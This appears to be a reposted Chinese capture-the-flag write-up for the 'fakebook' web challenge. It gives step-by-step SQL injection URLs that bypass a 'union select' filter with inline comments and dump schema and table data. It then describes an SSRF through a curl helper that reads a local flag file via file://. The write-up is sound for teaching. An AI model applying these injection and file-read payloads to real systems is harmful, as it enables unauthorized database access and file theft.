攻防世界-web-fakebook-从0到1的解题历程writeup
題目分析
拿到題目發(fā)現(xiàn)有注冊登錄界面,一般給了注冊界面的很少會是sql注入登陸界面的,所以嘗試先注冊一個賬號。
發(fā)現(xiàn)這邊會加載注冊時填寫的blog地址,并將內(nèi)容加載到一個iframe中。
這時發(fā)現(xiàn)網(wǎng)址為
http://159.138.137.79:55692/view.php?no=1感覺就是有sql注入漏洞,雖然不知道考點在不在這,但是先注了再說。
嘗試了一下就發(fā)現(xiàn)是數(shù)字型注入
sqlmap一把梭失敗emmm
嘗試下手工注入
獲取到列數(shù)位4列
http://159.138.137.79:55692/view.php?no=1 order by 4#查詢數(shù)據(jù)庫
http://159.138.137.79:55692/view.php?no=-1 union select 1,1,1,database()#果然,找到了sqlmap失敗的原因。既然這邊有過濾那么本題不出意外考點應(yīng)該就在這里了。
解題思路
第一步找到過濾掉了哪些。
嘗試了一下發(fā)現(xiàn)過濾了union select
使用union/**/select繞過
http://159.138.137.79:55692/view.php?no=-6 union/**/select 1,2,3,4#發(fā)現(xiàn)username處顯示出來了,其余地方為反序列化失敗。所以先在username處將數(shù)據(jù)帶出。
http://159.138.137.79:55692/view.php?no=-6 union/**/select 1,database(),3,4得到database為fakebook
http://159.138.137.79:55692/view.php?no=-6 union/**/select 1,(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables WHERE TABLE_SCHEMA="fakebook"),3,4得到表名為users
http://159.138.137.79:55692/view.php?no=-6 union/**/select 1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'users'),3,4得到字段為no,username,passwd,data
明顯no,username,passwd為賬號基本信息,查詢data
得到
將得到的data傳入聯(lián)合查詢第四列的返回結(jié)果
發(fā)現(xiàn)可以成功解析。
使用nikto對網(wǎng)站進行掃描發(fā)現(xiàn)
有user.php的備份文件
function get($url){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$output = curl_exec($ch);$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);if($httpCode == 404) {return 404;}curl_close($ch);return $output;}這邊get傳入的就是用戶信息中的blog地址,如果不是404就會將內(nèi)容讀出來。
存在ssrf文件讀取
讀取file:///var/www/html/flag.php即可
總結(jié)
以上是生活随笔為你收集整理的攻防世界-web-fakebook-从0到1的解题历程writeup的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 攻防世界-web-shrine-从0到1
- 下一篇: 攻防世界-web-FlatScience